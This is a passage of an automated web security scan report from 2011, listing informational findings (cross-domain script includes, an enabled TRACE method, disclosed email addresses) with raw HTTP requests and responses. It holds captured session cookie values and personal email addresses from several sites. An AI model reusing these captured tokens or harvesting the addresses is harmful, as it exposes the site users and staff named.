xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/resources/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.38. http://www.softlayer.com/resources/mobile-apps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/mobile-apps/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /resources/mobile-apps/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 24909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/resources/mobile-apps/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.39. http://www.softlayer.com/sitemap/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /sitemap/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sitemap/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 27263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/sitemap/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.40. http://www.softlayer.com/solutions/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /solutions/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /solutions/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:26 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:26 GMT
Connection: close
Content-Type: text/html
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/solutions/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.41. http://www.softlayer.com/specials/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /specials/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /specials/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 20444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/specials/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.42. http://www.softlayer.com/virtualization/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /virtualization/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /virtualization/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 22859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/virtualization/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.43. http://www.stumbleupon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 10210
Date: Wed, 06 Jul 2011 11:21:19 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110701-00"></script>
...[SNIP]...
</div>
   <script src="http://connect.facebook.net/en_US/all.js#appId=8ab252785ffd2ebc69f34b48c78a931d&xfbml=1&status=1&cookie=1"></script>
   <script src="http://cdn.stumble-upon.com/js/facebook_connect.js?v=20110701-00"></script>
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110701-00"></script>
...[SNIP]...

14.44. http://www.stumbleupon.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /login.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.php HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 9553
Date: Wed, 06 Jul 2011 11:21:20 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110701-00"></script>
...[SNIP]...
</div>
   <script src="http://connect.facebook.net/en_US/all.js#appId=8ab252785ffd2ebc69f34b48c78a931d&xfbml=1&status=1&cookie=1"></script>
   <script src="http://cdn.stumble-upon.com/js/facebook_connect.js?v=20110701-00"></script>
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110701-00"></script>
...[SNIP]...

14.45. http://www.stumbleupon.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 48987
Date: Wed, 06 Jul 2011 11:15:24 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110701-00"></script>
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110701-00"></script>
...[SNIP]...

14.46. http://www.texotela.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4043
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: </title>
<style type="te
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

14.47. http://www.texotela.co.uk/code/jquery/newsticker/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /code/jquery/newsticker/ HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5859
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: jQuery - newsticker</tit
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

14.48. http://www.tudou.com/v/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equ
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.tudouui.com/js/lib/tuilib_76.js"></script>
...[SNIP]...

14.49. http://www.zune.net/en-US/support

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-US/support HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
</div><script src="http://siterecruit.comscore.com/sr/zune/broker.js"></script>
...[SNIP]...

14.50. http://www.zune.net/en-US/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-US/support/ HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S501
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
</div><script src="http://siterecruit.comscore.com/sr/zune/broker.js"></script>
...[SNIP]...

14.51. http://zuneinsider.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zuneinsider.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: zuneinsider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:08 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://zuneinsider.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile
...[SNIP]...
<![endif]-->         <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2'></script>
...[SNIP]...
<p><script src="http://player.wizzard.tv/player/o/j/x/130955714710/config/k-464b5632d758bfe2/uuid/root/height/175/width/300/episode/k-0b1c78c2c985f196.m4v" type="text/javascript"></script>
...[SNIP]...
<p><script src="http://player.wizzard.tv/player/o/j/x/130835638984/config/k-464b5632d758bfe2/uuid/root/height/175/width/300/episode/k-bf810eb2f0a26423.m4v" type="text/javascript"></script>
...[SNIP]...
<div class="textwidget"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div class="textwidget"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15. TRACE method is enabled
There are 2 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


15.1. http://widgets.digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: d12660513b5eb025

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:55:05 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: d12660513b5eb025; traffic_control=f04100000060110000168986608%3A219%3A112; d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2
Accept-Encoding: gzip
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Fo
...[SNIP]...

15.2. http://www.stumbleupon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: a323be4dbcb3777d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 652
Date: Wed, 06 Jul 2011 11:15:25 GMT
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: a323be4dbcb3777d; su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=
...[SNIP]...

16. Email addresses disclosed
There are 33 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


16.1. http://techflash.com/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techflash.com
Path:   /about.html

Issue detail

The following email address was disclosed in the response:

Request

GET /about.html HTTP/1.1
Host: techflash.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-399196261-1309960828609; s_pers=%20s_vnum%3D1312552828670%2526vn%253D1%7C1312552828670%3B%20s_lv%3D1309960845575%7C1404568845575%3B%20s_lv_s%3DFirst%2520Visit%7C1309962645575%3B%20s_dslv%3DFirst%2520Visit%7C1310565645579%3B%20s_p12%3DFirst%2520Visit%7C1310565645581%3B%20s_invisit%3Dtrue%7C1309962645583%3B; s_sess=%20s_ria%3Dflash%252010%257Csilverlight%2520not%2520detected%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:01:12 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
<a href="greglamm@bizjournals.com">
...[SNIP]...

16.2. http://w.sharethis.com/button/buttons.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==
If-None-Match: "320f3-acc9-4a6cf6cc2f600"
If-Modified-Since: Wed, 29 Jun 2011 01:08:40 GMT

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 30 Jun 2011 01:37:27 GMT
ETag: "22eb1-b3ad-4a6e3f18a43c0"
Accept-Ranges: bytes
Content-Length: 45997
Content-Type: application/javascript
Date: Thu, 07 Jul 2011 00:00:57 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
lse};stLight.onReady=function(){stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.log("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b="share4x";if(switchTo5x){b="share5x"}if(stLight.hasButtonOnPage()){if(stLight.loadedFromBar){if(switchTo5x){b="bar_share5x"}else{b="bar_share4x"}}}else{if(stLight.loadedFromBar){b=
...[SNIP]...

16.3. http://www.beautyoftheweb.com/combres.axd/siteJs/-1234531867/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyoftheweb.com
Path:   /combres.axd/siteJs/-1234531867/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /combres.axd/siteJs/-1234531867/ HTTP/1.1
Host: www.beautyoftheweb.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate, max-age=2578057
Content-Length: 1134547
Content-Type: application/x-javascript
Expires: Fri, 05 Aug 2011 11:46:32 GMT
Last-Modified: Wed, 06 Jul 2011 11:46:32 GMT
ETag: "-1234531867"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:54 GMT

/** * SWFAddress 2.4: Deep linking for Flash and Ajax <http://www.asual.com/swfaddress/> * * SWFAddress is (c) 2006-2009 Rostislav Hristov and contributors * This software is released under the MI
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

16.4. http://www.cadence.com/_layouts/_cadenceomniture/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /_layouts/_cadenceomniture/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_layouts/_cadenceomniture/s_code.js HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600, no-check
Content-Length: 29310
Content-Type: application/x-javascript
Content-Location: http://www.cadence.com/_layouts/_cadenceomniture/s_code.js
Last-Modified: Wed, 18 Aug 2010 21:44:38 GMT
Accept-Ranges: bytes
ETag: "0a7598e1e3fcb1:2a8"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 07 Jul 2011 00:00:25 GMT

/* SiteCatalyst code version: H.15.1
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/***************************** REVISIONS *****************************/
/*
...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
